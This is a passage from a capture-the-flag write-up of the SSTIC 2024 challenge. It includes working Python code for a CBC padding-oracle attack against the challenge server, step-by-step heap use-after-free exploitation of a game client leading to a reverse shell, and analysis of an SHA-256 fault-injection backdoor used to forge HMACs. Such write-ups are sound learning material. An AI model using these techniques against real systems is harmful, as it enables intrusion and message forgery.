Author: Robert Xiao (@nneonneo)
- Introduction
- Tools Used
- Prologue
- Chapter 1
- Chapter 2
- Chapter 3
- Chapter 4
- Chapter 5
- Final Step
- Solution Summary
- Timeline
- Conclusion
I participated in the SSTIC challenge for the fourth time this year, and I really enjoyed the depth and difficulty of challenges. This year's challenge was a fully linear design, in line with many prior years (e.g. 2021, 2022), and was focused on cryptography and binary exploitation challenges. After an easy forensic prologue challenge, we get a sequence of increasingly hard challenges: exploiting bitflips in a CBC cipher, exploiting a multiplayer game client using a second client, using a fault injection on SHA-256 to forge an HMAC signature, exploiting a custom build of Google Chrome, and finally exploiting a Windows kernel with a custom network protocol driver installed.
The challenge this year was separated into a prologue and five chapters which needed to be completed in sequence. As usual, the goal was to recover an email address ending in @sstic.org
and send an email to complete the challenge. Along the way, flags for each chapter could be captured and (optionally) submitted to the website to publicly display progress.
My timeline of the chapters runs as follows (all times in my timezone, GMT-7); a fuller accounting of time is given in the Timeline section. Note that there was a DST switchover in France on March 31st.
- Fri Mar 29, 8:36 am: Start the challenge.
- Fri Mar 29, 9:34 am (+0:58): Complete the prologue.
- Fri Mar 29, 4:10 pm (+6:36): Complete chapter 1.
- Fri Mar 30, 6:14 am (+14:04): Complete chapter 2.
- Fri Mar 30, 6:13 pm (+11:59): Complete chapter 3.
- Sat Mar 31, 4:26 am (+10:13): Complete chapter 4.
- Mon Apr 2, 2:45 am (+46:19): Complete chapter 5.
- Mon Apr 2, 3:22 am (+0:37): Send email to complete the challenge.
Everything was presented in English this year. The release of the challenge included this announcement:
The year is 2022. Gunshots shattered the night. A witness caught a glimpse of a vehicle at the scene — a Tesla, they claim? The investigators on the case firmly believe this incident is affiliated with a clandestine criminal group that has eluded them for years... You are given the police reports and a backup of the car's logs. Your technical expertise is needed to move the investigation forward!
Download the challenge files (sha256: e95deeb7202cc10786f767f83644291bd76958d86e2d311c4e93efade85b75cd)
Here, I list all of the tools that I used throughout the challenge.
- Computers: 2019 MacBook Pro, Windows 10 desktop computer
- Text editors: BBEdit, VS Code
- VMWare Fusion 11, with an Ubuntu 22.04 VM:
- gdb 12.1
- Docker
- WinDbg & kdnet
- Ghidra
- Python 3.10
We're given a pair of PDF "police reports" (interview, requisition), along with a PostgreSQL database dump called teslamate.bck
.
The interview file is a transcription of an interview between the police and a witness to the crime. The witness states that a Tesla was seen speeding away from the crime scene. The police ask at the end about the car's most visited places, but the witness does not know. The requisition file states that teslamate.bck
is a backup of the only Tesla that was in the area on that date.
Googling for teslamate.bck
leads us to the TeslaMate documentation on backup and restore. We follow the docker-compose installation instructions to install TeslaMate, then follow the restore instructions to import the database dump. This enables a Grafana dashboard (username admin
, password admin
) which shows detailed statistics about the car's drives, usage, health, and more.
Per the interview, the police are interested in the car's most visited places. We can view the Drive Stats dashboard in Grafana to see the car's "Top Destinations":
The top destinations have some unusual names:
Domicile_http_163
Meulenbaantje, 172 Essen, belgium
ServerRoom_99
Camouflagepad bis, 233 RT Putte, Pays-Bas
Zwarte Duin, Ossendrecht, Woensdrecht
:8080, Eichen, Bad Münstereifel
From the http
and :8080
, we can guess that we're looking for a URL. Putting the numbers together, we get http://163.172.99.233:8080. Visiting that page shows us "Chapter 1: Intrigue in the Interstice", along with a flag: SSTIC{0a3ef4d4bb265ca2f27dd557be06e47e84aaacabdc501daade6ee97b8c0e8f3c}
. On to chapter 1!
The webpage we found tells us that the next step is to conduct a man-in-the-middle attack between a "license server" and a number of game clients. We can set up a MitM listener, which will intercept any connections from clients. We can choose to forward their messages on to the license server, and tamper with any of the messages.
The provided mitm.py
forwards all connections without tampering and dumps out every message in hex. When we set up the MitM, we're told up front that we will see every message type in under five minutes, so we can capture packets for five minutes and analyze the results.
Each message appears to be the byte 0x01, followed by a random-looking blob of data (likely encrypted). The blob is always a multiple of 16 in length, suggesting that we're dealing with a 128-bit block cipher in a non-stream-cipher mode (such as ECB or CBC mode). Since there doesn't seem to be any repeats amongst the data, and the data is always at least 32 bytes long, we can guess that it's likely to be CBC mode with a 16-byte IV followed by the CBC-encrypted payload.
To confirm our guess, we can take any message and flip bits in the IV (first 16 bytes), then send it to the server to see what happens. If the communications are using CBC, flipping a bit in the IV will flip the corresponding bit in the first plaintext block, which will alter the decrypted message. I used the script test1_bitflips.py
to experiment with different bit flips.
Flipping certain bits provokes an error, which is a packet with initial byte 0x00 and a plaintext payload, thus allowing us to easily identify what effect our message had. I took a random client message (0179fe28715dba1dfc1eeda4d86979f8d2e0b008e42a0494aebea272c75b3668e0fa1f5123bce7a1b8e35a443f69fe767f
) and collected the results of various bitflips (note that data[1]
is the first byte of the IV):
-
data[1] ^= 1
..data[8] ^= 1
=>Invalid session ID
-
data[9] ^= 1
=> no response (possibly waiting for more data) -
data[9] ^= 1 ^ 2
=>Initiate session with a 'hello' message
-
data[9] ^= 1 ^ 3
=>You must be connected to perform this action
-
data[9] ^= 1 ^ 4
=>You must be connected to perform this action
-
data[9] ^= 1 ^ 5
=>Initiate session with a 'hello' message
-
data[9] ^= 1 ^ 6
=>Initiate session with a 'hello' message
-
data[9] ^= 1 ^ 7
=>You must be connected to perform this action
-
data[9] ^= 1 ^ 8
=>You must be connected to perform this action
-
data[9] ^= 1 ^ 9
=>Your account must be activated to perform this action
-
data[9] ^= 1 ^ 10
=>Unknown message type
-
data[10] ^= 100
=>Message is shorter than the announced 97 bytes
-
data[11] ^= 1
=>Message is shorter than the announced 261 bytes
-
data[11] ^= 0x80
=>Payload length cannot be higher than 1013
-
data[17] ^= 1
=>Invalid ISO 7816-4 padding
It's a good thing that the error messages are so chatty! From this, we can infer that the packet structure is as follows:
- 8 byte session ID
- 1 byte message type, valid types are 1-9
- 2 byte message length, little-endian order
- Variable-length message
We can guess that the sample message has a message type of 1 and a message length of 5, meaning that the total message is 16 bytes in size. This means that the second block is just padding, and we're told that the padding format is ISO 7816-4 (how convenient!). This padding scheme consists of a 0x80 byte followed by enough 0x00 bytes to make a full block.
Since we're told if the padding is correct or not, this leads to a classic CBC padding oracle attack. In the CBC padding oracle, we can decrypt an arbitrary ciphertext block $C$ by submitting $IV \parallel C$ and varying $IV$. The result will be $D_k(C) \oplus IV$, where $D_k$ is the raw ("ECB") AES decryption operation. Starting with the last byte of the block, we step through all possible corresponding bytes in the IV, until the padding is correct. If the padding is correct for IV byte $b$, the corresponding byte of the plaintext $D_k(C)$ should be $b \oplus \texttt{0x80}$.
In rare cases, we might end up finding two validly-padded messages: if the previous byte decrypts to 0x80, the current byte could validly decrypt to either 0x00 or 0x80. To deal with this case, it suffices to XOR the previous byte's IV with 0x01 if two validly-padded messages are found and try again.
Once we know the final byte of $D_k(C)$, we can fix $IV$ such that the final byte of $D_k(C) \oplus IV$ is 0x00, then move on to the previous byte. In this way, we can decrypt the ciphertext block one byte at a time, costing us on the order of 256*16 = 4096 messages.
I used the following code to decrypt messages. To speed things up, I used a simple persistent cache for decrypted blocks (cache.py
).
import socket
from cache import get_cached_client_decrypt, set_cached_client_decrypt
from multiprocessing.pool import ThreadPool
def xor(a, b):
return bytes([ca^cb for ca,cb in zip(a, b)])
def try_one(data):
s = socket.create_connection((SERVER_HOST, SERVER_PORT))
s.send(data)
mtype = s.recv(1)
payload = s.recv(1024)
s.close()
return data, mtype[0], payload
def try_position(known, ct_block, fillchar=0):
datas = [b"\x01" + bytes([fillchar] * (16 - len(known) - 1) + [j] + known) + ct_block for j in range(256)]
with ThreadPool(32) as p:
good = []
total = 0
for data, mtype, payload in p.imap_unordered(try_one, datas):
total += 1
if (mtype, payload) != (0, b'Invalid ISO 7816-4 padding'):
good.append(data[16 - len(known)])
if len(good) == 1 and total > 1:
return good[0]
elif len(good) >= 2:
return None
return None
def _decrypt_block(ct_block):
known = []
fillchar = 0
while len(known) < 16:
print("...known:", bytes(known).hex())
c = try_position(known, ct_block, fillchar=fillchar)
if c is None:
# oops, next bytes were flipped to 0x80 0x00 ... so all possibilities work - backtrack
fillchar += 1
known = known[1:]
continue
known = [0x80 ^ c] + known
return bytes(known)
# test: _decrypt_block(bytes.fromhex("20d9a741ab8fee380535a6080ecd6b5b"))
def decrypt_block(ct_block):
pt = get_cached_client_decrypt(ct_block)
if pt:
return pt
pt = _decrypt_block(ct_block)
set_cached_client_decrypt(ct_block, pt)
return pt
def decrypt_message(ct):
pt = b""
for i in range(16, len(ct), 16):
iv = ct[i-16:i]
ptb = decrypt_block(ct[i:i+16])
ptb = xor(iv, ptb)
pt += ptb
return pt
In this way, we can successfully decrypt the messages sent by the client. Unfortunately, the messages sent from the server use a different key, so this technique won't work for server messages.
Note that we can also encrypt messages using our decryption oracle by going backwards: starting at the last block $M_n$ of our desired message $M_1 ... M_n$, we decrypt an arbitrary ciphertext $C_n$ to get plaintext $P_n$, then set the previous ciphertext block to $C_{n-1} = P_n \oplus M_n$; we then decrypt that new block to $P_{n-1}$ and set $C_{n-2} = P_{n-1} \oplus M_{n-1}$, proceeding until we set $C_0$ (the IV). The code to do this looks like this:
def encrypt(data):
assert len(data) % 16 == 0
ct = b"\x00" * 16
for i in reversed(range(0, len(data), 16)):
ct = xor(data[i:i+16], decrypt_block(ct[:16])) + ct
return ct
After decrypting several messages and experimenting with various payloads (test2_serversend.py
), we can identify the following client message types:
- 1: "initiate": session ID is zero, payload is
Hello
- 2: (requires initiate) "connect": payload is 64 hex chars
- sample:
799c80013372641235b052e75e09113813a5ddf0f0866100d10c03f82406a97f
- when sending random junk as the payload, the response is
Invalid credentials
- sample:
- 5: (requires initiate) "version": payload is
version
- 6: (requires initiate): payload is ten digits that look like a timestamp
- sample:
1711730376
- sample:
- 7: (requires connect) account info: payload is JSON
- sample:
{"username": "", "password": "", "activation key": ""}
- sample:
- 8: (requires connect): payload is JSON
- 9: (requires activation): payload is JSON
- sample:
{"ts": 0}
- sample:
{"ts": 1711730753}
- sample:
The JSON messages look interesting! In order to send them, we need to "connect", which we can do by replaying a suitable connection message.
When using bit-flipping to send an invalid JSON message, the resulting error contains the decrypted ciphertext as a Python bytes literal, e.g.: Unable to parse JSON: b'*****Lm\xd0\xd4x\x19\xc7\x0b\xe8\xd4\t\x89\r\x80D\xa1:k\xd2&\x96\xc1\xbfqSS\x97\x7f[\x06\x1d\x9f'
This is very useful, because it gives us a faster way to decrypt messages: we prepend a known "header" to the message, then append the unknown ciphertext, and finally append a tail for padding. This is implemented as fast_decrypt
in decrypt_client.py
:
def fast_decrypt(ct):
""" Fast decrypt using JSON error leak. Requires session ID + credential in config. Both session ID and credential should be hex."""
from ast import literal_eval
assert len(ct) % 16 == 0
if all(get_cached_client_decrypt(ct[i:i+16]) for i in range(16, len(ct), 16)):
return decrypt_message(ct)
while 1:
try:
s = socket.create_connection((SERVER_HOST, SERVER_PORT))
s.send(b"\x01" + encrypt(pad(bytes.fromhex(SESSION_ID) + struct.pack("<BH", 2, len(CREDENTIALS)) + CREDENTIALS.encode())))
resp = s.recv(1024)
if resp[0] == 0:
raise Exception(resp[1:].decode())
s.send(b"\x01" + encrypt(bytes.fromhex(SESSION_ID) + struct.pack("<BH", 7, 5 + 16 + len(ct)) + b"*****") + ct + encrypt(pad(b"")))
resp = s.recv(1024)
if not resp.startswith(b"\x00Unable to parse JSON: "):
raise Exception("Bad response: " + repr(resp))
break
except Exception as e:
print("oops", e)
continue
_, val = resp.split(b": ", 1)
# drop ciphertext IV and junk from tail
pt = literal_eval(val.decode())[21:-16]
assert len(ct) == len(pt) + 16
for i in range(16, len(ct), 16):
iv = ct[i-16:i]
set_cached_client_decrypt(ct[i:i+16], xor(iv, pt[i-16:i]))
return pt
def pad(pt):
from Crypto.Util.Padding import pad as _pad
return _pad(pt, 16, "iso7816")
def unpad(pt):
from Crypto.Util.Padding import unpad as _unpad
return _unpad(pt, 16, "iso7816")
With this, we can decrypt client messages and encrypt messages to the server very quickly.
Finally, we need to decrypt the server messages to see what the responses look like. For this, we need a captive client that we can feed messages to. We specifically look for clients right after they send an initation ("Hello") message, so we have them in a known state (capture_client.py
). We can then experiment with bitflipping messages received from the server (test3_clientflips.py
).
It's quickly evident that the response packet format is the same as the request packets. With some trial and error, we are able to decrypt a single server response to an initiation message: 3a8ee050fe4b39f7b910e598d36950f0c3da87ba22ff9ef5edfe24f45b4c4b50b8bb0dc133aa58d19011a5479c893ce3
decrypts to ce2895b773173c8a01050048656c6c6f80000000000000000000000000000000
. We know the session ID from the client's next message, and we can guess the remaining format from the format of the initiation message and by using bitflips.
Using this single decrypted packet, we can reuse the same JSON decryption approach against the client to decrypt server messages (decrypt_server.py
).
From this, we can fully characterize the various response messages:
- 1: "initiate": payload is
Hello
- 2: "connect": payload is JSON
- sample:
{"username": "r2d2", "activated": false}
- sample:
{"username": "trinity", "activated": true}
- sample:
{"username": "mario", "activated": true}
- sample:
{"username": "kenny", "activated": false}
- sample:
- 5: "version": version number
- sample:
1.3.37
- sample:
- 6: "pong": payload is ten digits that look like a timestamp, same as the corresponding "ping" packet
- sample:
1711730376
- sample:
1711730384
- sample:
- 7: payload is JSON
- sample:
{"username": "r2d2", "password": "not_a_bot", "activation key": "Account not activated"}
- sample:
{"username": "kenny", "password": "Hmmhmpf hmm hmmmpf", "activation key": "Account not activated"}
- sample:
- 9: "changelog": payload is JSON
- sample:
[{"ts": 1691691690, "note": "Initial release"}, {"ts": 1693371000, "note": "Added clouds to the sky"}, {"ts": 1694291000, "note": "Removed cheatcodes because players kept abusing them"}, {"ts": 1694760000, "note": "Fixed bug where AI would stop playing and commit suicide"}]
- sample:
The general flow is as follows:
- Client request 1, server responds with a session ID
- Client request 2 with a 64-hex-char authentication code, server responds with the corresponding user record
- Client request 7 with
{"username": "", "password": "", "activation key": ""}
, server responds with the account information including key
Therefore, we just have to execute this flow with an activated user's authentication code, such as that of trinity
or mario
. This is performed in test4_actkey.py
. When run, we get our activation key PR2YU5CZGCYMS272GLZ1WA43W7P44I7S
. Punching that into the site takes us to http://163.172.99.233:8080/PR2YU5CZGCYMS272GLZ1WA43W7P44I7S, which gives us a flag: SSTIC{f4746e9051d51bcf26c77f02ccb5790375f873a2a2560478dd41d309bac9ab2d}
and introduces us to Chapter 2: The Green Shard Brawl.
Our next target is the lead developer of the secret organization, who plays a game called Green Shard Brawl. We're given the client (a Linux binary) and sources for the server (written in Python), attached here in chapter2. We can communicate with the server, and our goal is to compromise the developer's client and launch a reverse shell.
We're given a nice docker-compose setup which launches the server and the vulnerable client. However, the client is launched with an Xvfb, so we can't see the game. Thus, my first step was to add apt-get install -y x11vnc
to the Dockerfile, and launch x11vnc
from run-client.sh
:
x11vnc -display $DISPLAY -bg -forever -noxdamage -passwd PASSWORD -listen localhost -xkb
With this, we can use a VNC client to view the game and even interact with it for testing. We can even launch a second client on a separate Xvfb + x11vnc setup to interact with the first one. Here's what the game looks like with two players:
The game is very simple. It's a platforming PvP game with two teams, red and blue, and three "maps": a red zone on the left, a main zone in the middle, and a blue zone on the right. Players can walk, jump, collect items, and attack other players when they get close enough. There are two kinds of items: hearts, which replenish HP, and a "green shard", which creates a shield that absorbs damage.
Just by playing the game solo for a minute, we can quickly identify a bug: after picking up the green shard, we get a shield for 20 damage, but if we walk off the current map and enter a different one, the shield suddenly shows a ridiculous value:
The value shown is 34247950336, or in hex, 0x7f9564000. Checking /proc/<pid>/maps
for the client, we see an allocation at 0x7f9564000000 - we've just found some kind of use-after-free that leaks a memory address, and we haven't even reversed the game yet!
The server is written in plain Python, so it is a good place to start understanding the client-server protocol. The protocol is well-described in protocol.py
and server.py
. There are several messages that the client can send:
- Authentication: fixed license key and 16-byte username (must be valid Unicode, and can't contain NULs)
- Heartbeat: must send this periodically to avoid being disconnected
- Client Player Info: set lots of information about the client: map ID, x/y position, facing direction, AFK flag, shield status and shield HP, username, and "last attacker" name. Nothing is validated; as
server.py
notes:No specific validation of user-provided coordinates, you're free to cheat... =)
- Client Attack: attack a particular player with an arbitrary amount of damage (64-bit quantity)
- Object Seizing: grab an object by ID
- Client Disconnect: tell the server you're disconnecting
- Chat: send a chat message, contents are arbitrary bytes
The server also periodically sends server player info and map info packets, containing detailed information about all players and map objects respectively.
Notably, the server really doesn't do much; it just keeps track of the information sent by clients, and forwards things like chats and attacks onto other clients. There is virtually no server-side validation.
The client is pretty heavyweight (150KB) as it also handles all of the graphics for the game. It spawns several threads for the graphics and event handling, but the only two relevant threads for us are the main thread and the network thread.
Using the definitions of the various packets from the server, it is fairly straightforward to reverse the network thread and identify the functions which handle each server packet. The client is primarily concerned with managing two structures for the game objects (items) and the players:
/* 0x20 bytes */
struct object {
/* 0x00 */ long shield_value;
/* 0x08 */ short object_id;
/* 0x0c */ int refcount;
/* 0x10 */ byte map_id;
/* 0x12 */ ushort pos_x;
/* 0x14 */ ushort pos_y;
/* 0x18 */ int object_type;
};
/* 0xb8 bytes */
struct player {
/* 0x00 */ void *mutex;
/* 0x08 */ short id;
/* 0x0c */ int nonlocal;
/* 0x10 */ byte disconnected;
/* 0x14 */ int team;
/* 0x18 */ uint facing;
/* 0x1c */ char name[16];
/* 0x2c */ uint hp;
/* 0x30 */ byte map_id;
/* 0x38 */ double x;
/* 0x40 */ double y;
/* 0x48 */ double vx;
/* 0x50 */ double vy;
/* 0x58 */ byte on_ground;
/* 0x59 */ byte is_afk;
/* 0x5a */ char last_attacker[16];
/* 0x70 */ long attack_power;
/* 0x78 */ int attacking; // frame number within animation
/* 0x7c */ int attacked; // frame number within animation
/* 0x80 */ long last_attack;
/* 0x88 */ int being_thrown;
/* 0x90 */ long name_tex;
/* 0x98 */ int text_w;
/* 0x9c */ int text_h;
/* 0xa0 */ byte shielded;
/* 0xa8 */ struct object *shield;
/* 0xb0 */ long shield_time;
};
We can observe a few interesting facts from reversing the main loop and network thread functions:
- Chats are stored in a 16-element static array of
char *
pointers, and expire after 4 seconds. Each received chat ismemcpy
'd into a freshly-malloc'd buffer. - All items, including shields, are reference counted, and are freed if the reference count hits zero.
- If the client is attacked (i.e. if it receives a server attack PDU where the victim ID is the client's own ID), it will first check to see if it has a shield. If it does, the shield value (first QWORD of the shield object) will be decremented by the attack value; if the shield value hits zero, its reference count is decremented.
- If the client moves off the edge of the map into a new map, the shield's reference count is decremented. However, the shield pointer is not reset to NULL, which leads to the observed use-after-free behaviour.
- Allocations primarily happen on the network thread, but objects may be deallocated from either the main thread or network thread.
Fact 5 means that objects primarily come from the heap associated with the network thread, which is nice because we can ignore all of the other memory allocations happening in the program. We're using glibc 2.35; in this version, freed allocations will go on the tcache if they were originally allocated on the same thread, or on the freelist if they were allocated on a different thread.
This version of glibc also uses PROTECT_PTR
to obfuscate the freelist pointers, which XORs a pointer at chunk
with &chunk >> 12
. Note that the next
element of the freelist lines up with the shield value. Since the freelist is initially empty, when we use fact (4) to free the shield, the shield value becomes PROTECT_PTR(chunk, 0)
which is simply the address of chunk
right shifted by 12.
From playing the game, we can observe that attacking a legitimate client causes the client to move itself (the local player) by a small amount in the opposite direction of the attack. Therefore, our client can push the developer's player towards the green shard, forcing it to pick up the shard, then push it further off towards a different map to trigger the UAF. Note that because the shield is freed on the main thread, the shield chunk immediately goes on the fastbin for the 0x30 size, instead of into the tcache.
Once we have the UAF and an ASLR leak of the heap base, we can trigger allocations via the chat feature to massage the heap. Initially, we don't have ASLR leaks of any other memory region except the network thread's heap, and we only get an 8-byte read via the local player's shield pointer. In order to obtain arbitrary read/write, I decided to manipulate the heap to the point where I could overlap an allocation with the local player, thereby enabling me to arbitrarily modify the shield pointer.
Since the local player is allocated before any other objects, I chose to do a multi-stage process which essentially involves controlling the shield pointers of two new players and pointing them at a specific address in the local player. I then disconnect both players, which causes the "reference count" to be decremented twice; this causes a free on a fake heap chunk which overlaps the local player's shield. Afterwards, we can reallocate this chunk any time we want to overwrite the local player's shield pointer.
In detail:
- Trigger shield UAF by punching the local player into a green shard, then into another map
- Chat to allocate two player-sized chunks with a fake chunks overlapping the place where the shield pointer will be. Fake chunk #1 points to fake chunk #2.
- Use shield UAF to modify the forward pointer of the freed shield to point at fake chunk #1, thus creating a linked fastbin list of three chunks (one real, two fake).
- Chat to allocate all three of these chunks, then let everything time out; this causes all five chunks (2 player-sized chunks, 3 object-sized chunks) to be freed to tcache by the network thread.
- Introduce two new players via authenticate PDUs which will allocate the two player-sized chunks.
- Chat to allocate the two object-sized fake chunks, overwriting both player's shield pointers to point at
local_player->attack_power
(local_player + 0x70
), such that the shield's refcount overlapslocal_player->attacker
(local_player + 0x7c
) - Attack the the local player with one of the new players, which sets
local_player->last_attacker
to the name of the new player, andlocal_player->attacker
to 1 - Disconnect both players, which decrements the fake shield's "refcount" (
local_player->attacker
) twice; using two players compensates for the fact thatattacker
may be incremented by the drawing logic- Once the "refcount" is zero, the "shield" will be freed to the tcache
- The freed "shield" is at
local_player + 0x70
; we arrange for the attacker name atlocal_player + 0x5a..0x6a
to have 0x55 atlocal_player + 0x68
, which puts the freed chunk in the 0x50 tcache bin
- Chat to reallocate both player-sized chunks to fix the heap headers for the object-sized fake chunks
- Wait until all chat chunks timeout and get freed (2x fake object-sized chunks, 2x real player-sized chunks)
At this point, we have a 0x50-sized chunk on the tcache which overlaps the local player's shield field. We can send a 0x40-byte chat to allocate a chunk at this address and overwrite the shield with an arbitrary pointer, giving us an 8-byte arbitrary read/write capability via the shield UAF.
We use the arb read to traverse the linked list of malloc arenas to find libc's main_arena
: the arena structure is always at +0x30 from the first page of the arena, and it has a pointer pointing to the next arena at +0x870. We can then leak the value of libc's environ
pointer, which gives us a stack address; finally, we can write a ROP chain to the stack eight bytes at a time, and trigger the ropchain by overwriting the convenient snprintf
pointer in the binary.
The full exploit can be found in exploit.py
. It takes a few minutes to run, since the arb read/write takes 5 seconds to time out the chat each time, but it usually does produce a reverse shell at the end.
Once we have our shell, we can find a file called memo.txt
containing the following:
gotta check out this link my bro sent me some time http://163.172.99.233:8080/956a07cd264c1df26beedcef1b3187ad
my password because my dumbass brain keeps forgetting it: ave_viridis_crystallum
Visiting that page gives us the chapter 2 flag: SSTIC{ae50935e902c926aa72cd5c526d128c947561f1ec3a0f6df4f753ad4e5e35a90}
, and takes us to Chapter 3: The Authenticator in SHAdow.
Now, we've gotten ourselves a chat application that lets the organization's members communicate securely. Although messages aren't encrypted, they are signed with a hardware security module nicknamed HSMM, and only validly-signed messages can be posted to the application.
We're given three components: a client app written in Python called "shardy", a server app written in Python called "mafiachat", and the HSM called "HSMM" which is a RISC-V binary running on "custom hardware" (i.e. emulated with a patched version of QEMU).
The client isn't too interesting; it just presents a nice interface which interacts with the server over REST API calls. The server code is very simple as well. The main server.py
provides endpoints for viewing users, reading messages, and posting messages. Posting a message requires a signature, which is verified by the HSM.
We're provided the RISC-V HSM binary and C source code, a patch file for QEMU to enable the hardware backdoor and patched QEMU, a patch file for binutils to allow assembly/disassembly of the backdoor instructions, a RISC-V sysroot and openssl libraries. We're also given a Dockerfile that runs the whole shebang - thanks!
The HSM itself communicates with a simple line-oriented text interface. We are provided with the full source code of the HSM in hsmm/src
. There are two operations: sign and verify. Sign takes a username, password, recipient, base64-encoded message, and two "extra" integers, and returns a base64-encoded message and signature. Verify takes a base64-encoded message and signature, and returns either 0 (verification failed) or 1 (verification passed).
We have the username and password for a testing account @mafiaTEST
, but not for any of the other accounts, so we can sign messages but only from @mafiaTEST
. We need to send a message to @mafiaBOSS
from @mafiaDEV
, meaning that we will need to forge a signature that will pass verification. Looking at message.c
, we can see that signatures are generated using HMAC-SHA256 using OpenSSL, using a key loaded from the hardware from special challenge-specific mkey
CSRs (RISC-V Control and Status Registers). We can also set two challenge-specific CSRs when signing a message, mafia_0
and mafia_1
, which are loaded with the "extra" integer values provided at the end of the signing request; a third CSR, mafia_1_now
, is zeroed at the start of main
.
The HSM runs on a custom build of QEMU that is patched to add these 11 extra 32-bit CSRs. There are eight mkey
CSRs with a hardcoded value (redacted in the provided code), which are combined to form a hardcoded 256-bit key. The remaining three CSRs, mafia_0
, mafia_1
, and mafia_1_now
, are used to tamper with the calculation performed by the instruction vsha2c_32
in a very specific way. vsha2c
is used to implement two rounds of SHA-2 compression, and the 32-bit variant is designed for SHA-256; these instructions are used by OpenSSL if the right environment settings are configured.
The CPU maintains four extra ulong
s of state: mafia_0
, mafia_0_now
, mafia_1
, and mafia_1_now
. mafia_0
, mafia_1
and mafia_1_now
can be set by writing the corresponding CSR, while mafia_0_now
is reset to zero whenever the instruction vsetvl
is executed. In vsha2c
, the value of mafia_0_now
is incremented twice; if it is equal to mafia_0
, then the value of mafia_1_now
is incremented. If mafia_1
equals mafia_1_now
, then the backdoor code generates a random number using RISC-V's RNG seed
CSR, which in QEMU is emulated using getrandom
, and adds that random number to the c
value of the incoming SHA-256 intermediate hash value.
In short: the mafia_*
backdoor CSRs effectively provide a controllable fault injection on SHA256. mafia_0
controls which round is targeted (even rounds only), as mafia_0_now
is reset to zero on each new block. mafia_1
controls which block is targeted, as mafia_1_now
is set to zero in main
, when the HSM binary is launched. The fault will cause a random 32-bit value to be added to one of the input words to the targeted round.
HMAC works as follows. For a hash function $H$ with a $B$-bit block size, define two $B$-bit constants ipad = 0x363636...
, opad = 0x5c5c5c...
. Then, for a $B$-bit key $k$ and message $m$, we have
$\operatorname{HMAC}(k, m) = H((k \oplus opad) \parallel H((k \oplus ipad) \parallel m))$
If the key is shorter than $B$ bits, it is padded on the right with zeros up to $B$ bits to form $k$.
In our case, $H$ is SHA-256, and $B$ is 512. SHA-256 itself can be written as repeated application of the SHA-256 compression function $F$ to successive blocks of a message (the Merkle-Damgård construction). Formally, a message $m$ is padded, then broken into 512-bit blocks $m_1, m_2, \ldots, m_n$. Starting from a fixed 256-bit initial hash value $h_0 = IHV$, calculate $h_i = F(h_{i-1}, m_i)$, with the final hash output being $h_n$.
The SHA-256 compression function $F(i, m)$ consists of 64 rounds operating on 8 32-bit integer "registers" labelled $a$ through $h$. These are initially set to the consecutive bits of the incoming hash value $i$.
The hash computation makes use of several nonlinear mixing functions, called $Ch(X, Y, Z)$, $Maj(X, Y, Z)$, $\Sigma_0(X)$, $\Sigma_1(X)$, $\sigma_0(X)$ and $\sigma_1(X)$, as well as a 64-element table of 32-bit constants called $K_0 \ldots K_{63}$. All arithmetic is done modulo $2^{32}$.
The input message block $m$ of 512 bits is first extended to a 64-element array $W_0 \ldots W_{63}$ of 32-bit integers (words) via a message schedule, which uses the consecutive bits of $m$ for $W_0$ through $W_{15}$, then $W_i = \sigma_1(W_{i-2}) + W_{i-7} + \sigma_0(W_{i-15}) + W_{i-16}$ for the remaining 48 entries.
Then, in round $i = 0..63$, we compute
- $T_1 = h + \Sigma_1(e) + Ch(e, f, g) + K_i + W_i$
- $T_2 = \Sigma_0(a) + Maj(a, b, c)$
- $(a, b, c, d, e, f, g, h) \leftarrow (T_1 + T_2, a, b, c, d + T_1, e, f, g)$
Finally, the output hash is given by adding each word of the initial hash $i$ to the corresponding register $(a, b, c, d, e, f, g, h)$.
In a fault injection attack, an attacker is able to cause a cryptographic algorithm to perform an erroneous calculation at some point. Here, the erroneous calculation is that we can essentially scramble one of the eight 32-bit words of the intermediate hash value in a specific round of the SHA256 compression function. We can also target a specific hash block to be tampered with, as HMAC-SHA256 consists of multiple hash calculations.
We can confirm that SHA256 is being tampered with by running the provided RISC-V openssl
binary in openssl/bin/openssl
(qemu-riscv64 -cpu 'rv64,zkr=true,v=true,vext_spec=v1.0,zvbb=true,zvknha=true' -L riscv/sysroot -E LD_LIBRARY_PATH='openssl/lib' -E OPENSSL_riscvcap='rv64imafdcvh_zicbom_zicboz_zicntr_zicsr_zifencei_zihintntl_zihintpause_zihpm_zawrs_zfa_zca_zcd_zba_zbb_zbc_zbs_zkr_v_zvbb_zve32f_zve64f_zve64d_zvknha_sstc_svadu' openssl/bin/openssl sha256
); every time we run this command with a fixed input, we get different output, corresponding to a fault injection at the 1st round of the 1st block (since the registers all default to 0). We can even use strace
to observe the getrandom
calls used by the backdoor, and confirm that the output matches the output of my pure-Python implementation of the backdoored SHA256 (sha256_backdoored.py
).
For a message $m$ of length $\le B - 72$ bits (i.e. $\le 55$ bytes long), which will be padded to one 64-byte block, the HMAC computation breaks down as four individual evaluations of $F$. Here, we show the order of these hash evaluations, as they are performed by OpenSSL:
- $c_0 = F(IHV, k \oplus ipad)$
- $c_1 = F(IHV, k \oplus opad)$
- $c_2 = F(c_0, m \parallel padding)$
- $c_3 = F(c_1, c_2 \parallel padding)$
We can fault the computation of $c_i$ by setting mafia_1 = i
and mafia_0
to be the 0-based index of the round to fault. Faulting a round causes a random 32-bit value $\Delta$ to be added to the $c$ variable at the start.
The SHA-256 round structure means that faults propagate relatively slowly, since in any given round only two of the eight state words will actually change, and each output is only affected by half of the state. Thus, by injecting a fault in a late round, we can obtain a hash which differs from other faulty hashes (or the correct hash) in a relatively small way.
For illustration, suppose we get two faulty hashes for the same message $m$, both faulted at round 62. Then, letting $\Delta_1$ and $\Delta_2$ be the two random values, and $(a, b, c, d, e, f, g, h)$ be the (common) register state at the start of round 62:
Comment | Message 1 | Message 2 |
---|---|---|
State at start of round 62 | $a, b, c, d, e, f, g, h$ | $a, b, c, d, e, f, g, h$ |
Fault injected | $a, b, c + \Delta_1, d, e, f, g, h$ | $a, b, c + \Delta_2, d, e, f, g, h$ |
$T_1$ calculated | $T_1 = h + \Sigma_1(e) + Ch(e, f, g) + K_{62} + W_{62}$ | $T_1 = h + \Sigma_1(e) + Ch(e, f, g) + K_{62} + W_{62}$ |
$T_2$ calculated | $T_2^1 = \Sigma_0(a) + Maj(a, b, c + \Delta_1)$ | $T_2^2 = \Sigma_0(a) + Maj(a, b, c + \Delta_2)$ |
Next round output | $(T_1 + T_2^1, a, b, c + \Delta_1, d + T_1, e, f, g)$ | $(T_1 + T_2^2, a, b, c + \Delta_2, d + T_1, e, f, g)$ |
